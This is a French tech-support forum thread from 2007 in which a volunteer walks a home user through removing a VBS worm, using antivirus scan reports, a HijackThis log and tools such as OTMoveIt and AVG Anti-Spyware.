                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
                Supprimé

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                Echec de la désinfection

                H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                Supprimé

                Résultat virusscan
                Scanner Malware name
                A-Squared X
                AntiVir JB
                ArcaVir Trojan.Sdbot.Bti
                Avast Zombie-2413
                AVG Antivirus Darth_Vader
                BitDefender Zombie.2413
                ClamAV DarthVader
                CPsecure X
                Dr.Web JB.dropper.2413
                F-Prot Antivirus Zombie.2413
                F-Secure Anti-Virus Virus.DOS.Zombie.2413
                Fortinet Zombie.2413
                Kaspersky Anti-Virus Virus.DOS.Zombie.2413
                NOD32 probably unknown CRYPT.TSR.COM.EXE
                Norman Virus Control X
                Panda Antivirus Zombie.2413
                Rising Antivirus Trojan.VB.mn
                Sophos Antivirus Zombie-2413
                VirusBuster Zombie.2413
                VBA32 Email-Worm.VBS.Lee-based
                0
                1. Contributeur sécurité
                  slt, ca se sont des virus dans ta messagerie thunderbird alors supprime les messages que tu ne connais pas et dans ta poubelle

                  C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                  Infecté par: Generic.Peed.Eml.09884D34

                  __________________

                  ça ce sont des virus dans la restauration systeme: c'est pour cela que ça a persisté meme en faisant une restauration :

                  désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)
                  puis réactive la.

                  H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                  Echec de la désinfection

                  H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                  Supprimé

                  _____________________

                  utilise pour supprimer tes traces

                  CCLEANER: (lance un nettoyage et répare 3 fois les erreurs) sans installer la barre yahoo

                  https://www.01net.com/telecharger/windows/Utilitaire/nettoyeurs_et_installeurs/fiches/32599.html

                  _________________

                  refait un scan en ligne et colle le rapport

                  _______________

                  si ca persiste

                  colle un rapport hijackthis

                  http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

                  manuel :

                  https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html

                  Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

                  ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

                  Ensuite avec Explorer créer un dossier c:\hijackthis
                  Décompresser Hijackthis dans ce dossier.
                  C'est important pour les sauvegardes."
                  0
                  1. Bonjour
                    et encore merci pour ton aide.
                    Voici le rapport bitdifender

                    C:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    C:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                    C:\pagefile.sys.vbs=>(unicode) Supprimé
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Echec de la désinfection
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Supprimé
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Echec de la désinfection
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Supprimé
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Echec de la désinfection
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Supprimé
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Echec de la désinfection
                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Supprimé
                    C:\WINDOWS\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    C:\WINDOWS\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                    C:\WINDOWS\pagefile.sys.vbs=>(unicode) Supprimé
                    D:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    D:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                    D:\pagefile.sys.vbs=>(unicode) Supprimé
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Infecté par: Win32.Netsky.C@mm.Damaged
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Echec de la désinfection
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Supprimé
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64) Echec de la mise à jour
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Infecté par: Win32.Netsky.C@mm.Damaged
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Echec de la désinfection
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Supprimé
                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64) Echec de la mise à jour
                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Echec de la désinfection
                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Supprimé
                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Echec de la désinfection
                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Supprimé
                    F:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    F:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                    F:\pagefile.sys.vbs=>(unicode) Supprimé
                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Echec de la désinfection
                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Supprimé
                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Echec de la désinfection
                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Supprimé
                    H:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    H:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                    H:\pagefile.sys.vbs=>(unicode) Supprimé
                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Echec de la désinfection
                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Supprimé
                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Echec de la désinfection
                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Supprimé
                    0
                    1. Asuivre le rapport
                      Hijackthis

                      Logfile of Trend Micro HijackThis v2.0.2
                      Scan saved at 12:41:40, on 09/10/2007
                      Platform: Windows XP SP2 (WinNT 5.01.2600)
                      MSIE: Internet Explorer v7.00 (7.00.6000.16512)
                      Boot mode: Normal

                      Running processes:
                      C:\WINDOWS\System32\smss.exe
                      C:\WINDOWS\system32\winlogon.exe
                      C:\WINDOWS\system32\services.exe
                      C:\WINDOWS\system32\lsass.exe
                      C:\WINDOWS\system32\svchost.exe
                      C:\WINDOWS\System32\svchost.exe
                      C:\WINDOWS\system32\ZoneLabs\vsmon.exe
                      C:\WINDOWS\Explorer.EXE
                      C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
                      C:\Program Files\Alwil Software\Avast4\ashServ.exe
                      C:\WINDOWS\system32\spoolsv.exe
                      C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
                      C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe
                      C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
                      C:\WINDOWS\System32\WScript.exe
                      C:\Program Files\RocketDock\RocketDock.exe
                      C:\WINDOWS\system32\ctfmon.exe
                      C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
                      C:\Program Files\FolderSize\FolderSizeSvc.exe
                      C:\WINDOWS\system32\ntvdm.exe
                      C:\WINDOWS\system32\nvsvc32.exe
                      C:\WINDOWS\system32\svchost.exe
                      C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
                      C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
                      C:\hijackthis\HijackThis.exe

                      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
                      R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.fr/?gws_rd=ssl
                      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
                      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
                      R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
                      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
                      R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
                      R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
                      R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
                      O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
                      O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_10\bin\ssv.dll
                      O2 - BHO: IEHlprObj Class - {CE7C3CF0-4B15-11D1-ABED-709549C10111} - C:\Program Files\TrueDownloader\truedownloaderie.dll
                      O2 - BHO: (no name) - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - (no file)
                      O2 - BHO: (no name) - {FFFFFEF0-5B30-21D4-945D-000000000000} - C:\PROGRA~1\STARDO~1\SDIEInt.dll
                      O3 - Toolbar: pdfMachine - {56CF4856-ECB4-4e46-A897-A378821F97B9} - C:\WINDOWS\system32\bgstb.dll
                      O3 - Toolbar: (no name) - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - (no file)
                      O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
                      O4 - HKLM\..\Run: [bgsmsnd.exe] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe
                      O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
                      O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
                      O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs
                      O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"
                      O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
                      O4 - HKCU\..\Run: [RamBoostXp] C:\Program Files\RamBoost XP\rambxpfr.exe
                      O4 - Startup: DateInTray.lnk = C:\Program Files\DateInTray\DateInTray.exe
                      O4 - Startup: DesktopEarth AutoStart.lnk = ?
                      O4 - Startup: Moniteur Fax-Voix.lnk = C:\OLIFAXVX\MONITEUR.EXE
                      O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
                      O8 - Extra context menu item: Télécharger avec Star Downloader - C:\Program Files\Star Downloader\sdie.htm
                      O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/13f0b4f24030b75c4e06/netzip/RdxIE601_fr.cab
                      O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://www.coupdepoucepc.com/scan8/oscan8.cab
                      O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - https://www.trendmicro.com/en_us/forHome/products/housecall.html
                      O16 - DPF: {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} (Zylom Games Player) - http://game12.zylom.com/activex/zylomgamesplayer.cab
                      O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553563000} - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
                      O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,1,0,4896/mcfscan.cab
                      O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
                      O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
                      O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
                      O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
                      O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
                      O23 - Service: Folder Size (FolderSize) - Brio - C:\Program Files\FolderSize\FolderSizeSvc.exe
                      O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
                      O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
                      O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
                      O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
                      0
                      1. Contributeur sécurité
                        FIX ces lignes avec hijackthis: ferme toutes les applications , ouvrir hijackthis faire do system scan only puis cocher chaque ligne sur la gauche puis cliquer en bas sur fix cheked:

                        O2 - BHO: IEHlprObj Class - {CE7C3CF0-4B15-11D1-ABED-709549C10111} - C:\Program Files\TrueDownloader\truedownloaderie.dll
                        O2 - BHO: (no name) - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - (no file)

                        O3 - Toolbar: (no name) - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - (no file)

                        O4 - HKLM\..\Run: [bgsmsnd.exe] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe

                        O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs

                        O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"

                        O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/13f0b4f24030b75c4e06/netzip/RdxIE601_fr.cab

                        ________________

                        télécharge OTMoveIt http://download.bleepingcomputer.com/oldtimer/OTMoveIt.exe (de Old_Timer) sur ton Bureau.
                        double-clique sur OTMoveIt.exe pour le lancer.
                        copie la liste qui se trouve en citation ci-dessous,
                        et colle-la dans le cadre de gauche de OTMoveIt :Paste List of Files/Folders to be moved.

                        Citation :

                        C:\WINDOWS\pagefile.sys.vbs

                        clique sur MoveIt! pour lancer la suppression.
                        le résultat apparaitra dans le cadre "Results".
                        clique sur Exit pour fermer.
                        poste le rapport situé dans C:\_OTMoveIt\MovedFiles.

                        il te sera peut-être demander de redémarrer le pc pour achever la suppression.si c'est le cas accepte par Yes.
                        http://img137.imageshack.us/img137/3558/refaitjk8.th.jpg

                        ________________

                        comme j'ai vu que tu avais netsky scan avec ce logiciel:
                        https://www.broadcom.com/support/security-center

                        et si tu peux vire le fichier incriminé manuellement dans ta sauvegarde foxmail
                        ________________

                        AVG antispyxare

                        https://www.01net.com/telecharger/

                        Tuto :
                        http://www.kachouri.com/tuto/tuto-161-avg-anti-spyware-75-pour-votre-securite.html

                        ->Relance AVG AS -> "Analyse" ->"Paramètres"

                        Sous la question "Comment réagir ?" :

                        -> clique sur "Actions recommandées" et choisis "Quarantaines"
                        -> Re-clique sur l'onglet "Analyse" puis réalise une "Analyse complète du système"

                        Si un fichier est infecté en fin d'analyse

                        ->Clique sur "Appliquer toutes les actions "

                        ->Clique sur "Enregistrer le rapport" puis sur "Enregistrer le rapport sous".

                        ->Enregistre ce fichier texte sur ton bureau ensuite colle le rapport ici

                        ________________

                        désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)

                        ________________

                        refait un scan en ligne pour voir
                        ________________

                        réactive la restauration systeme.
                        ______________
                        recolle hijackthis et dis tes pbs
                        0
                        1. J'en suis au redemarage après Movelt
                          Mais pas de rapport ou tu dis.
                          J'avais fait un copier coller de la collone de droite :
                          File move failed. C:\WINDOWS\pagefile.sys.vbs scheduled to be moved on reboot.

                          Created on 10/09/2007 14:27:28
                          Je suis en cour de téléchargement de AVG
                          A+
                          0
                          1. Comme le résultat ne ma semblais pas bon
                            j'ai refait la procédure
                            de fix cheked
                            il ne restait que les lignes
                            O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs j'ai coché que celle ci

                            O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe" cela je sais ce que c'est une barre de menu
                            https://punklabs.com

                            puis j'ai refait MoveIt
                            le rapport copier coller sans redemarage demandé.
                            C:\WINDOWS\pagefile.sys.vbs moved successfully.

                            Created on 10/09/2007 14:56:31
                            0
                            1. Rappoert AVG
                              ---------------------------------------------------------
                              AVG Anti-Spyware - Rapport d'analyse
                              ---------------------------------------------------------

                              + Créé à: 16:15:26 09/10/2007

                              + Résultat de l'analyse:

                              Rien à signaler.

                              Fin du rapport

                              Mais le les fichiers "pagefile.sys.vbs" son toujours là ?????
                              Denis
                              0
                              1. Contributeur sécurité
                                Télécharge ce tool de sUBs:

                                http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe

                                Double-clique dessus et laisse-toi guider.

                                _________________

                                Colle le rapport :
                                Clean permettra de faire du nettoyage et supprimer des fichiers que des anti-virus et anti-spywares n'ont pas pu trouver. Le logiciel est régulièrement mis à jour, vous devrez donc le re-téléchargé pour obtenir une version plus récente.

                                • Téléchargez clean.zip, décompressez-le sur votre bureau (clic droit / extraire tout), vous obtenez alors un dossier clean
                                • Démarrez Windows en mode sans échec : Guide pour redémarrer en mode sans échec
                                • Ouvrez le dossier clean qui se trouve sur ton bureau, et double-cliquez sur clean.cmd, une fenêtre noire va apparaître pendant un instant, laissez la ouverte jusqu'à ce qu'elle se ferme.

                                http://kerio.probb.fr/tuto-Clean-h37.html

                                ________________

                                désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)

                                ________________

                                refait un scan en ligne pour voir
                                ________________

                                réactive la restauration systeme.
                                ______________
                                recolle hijackthis et dis tes pbs
                                0
                                1. Merci pour ton aide.
                                  mais cela commence à devenir trop compliqué pour moi.
                                  Surtout que je ne sais pas si c'est un virus ?
                                  Mon ordi marche bien.
                                  Il y à juste ces fichiers qui sont apparue et le même mais appelé "MSRegInfo" qui ce lance avec Windows sans que je puisse l'en enpécher.
                                  Comme personne d'autre ne parle de ce problème sur Google, je croid que je vais en resté là pour le moment.
                                  Sauf si tu me dis qu'il faut impérativment poursuivre.
                                  A+
                                  Denis
                                  Encore merci.
                                  0
                                  1. Contributeur sécurité
                                    pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B

                                    c'est un virus donc si j'etais toi je continurai..

                                    a plus
                                    0
                                    1. Ok
                                      j'ai essaué Flash_Disinfector.exe mais très vite un message d'erreur titre "Windows pas de disque" contenu prtiel du message "Eception procesing message"
                                      annuler continuer reessayer
                                      rien ne marche. obliger de cliquer plein de fois sur annuler pour que la fenetre se ferme.

                                      Clean.cmd
                                      rapport
                                      09/10/2007 a 22:11:40,85

                                      *** Recherche des fichiers dans C:
                                      C:\autorun.inf FOUND

                                      *** Recherche des fichiers dans C:\WINDOWS\

                                      *** Recherche des fichiers dans C:\WINDOWS\system32
                                      "C:\WINDOWS\Downloaded Program Files\CONFLICT.1" FOUND

                                      *** Recherche des fichiers dans C:\Program Files
                                      *** Fin du rapport !

                                      Je m'arret là pour ce soir

                                      je suis sur le pont de puis 3h30 ce matin.
                                      dodo.
                                      Mais je pense apporter mon ordi à la clinique micro.
                                      sauf si pour toi on peut trouver une solution rappide.
                                      Un grand merci, tes explication était simple à suivre pour un amateur.
                                      Bonne nuit
                                      Denis
                                      0
                                      • 1
                                      • 2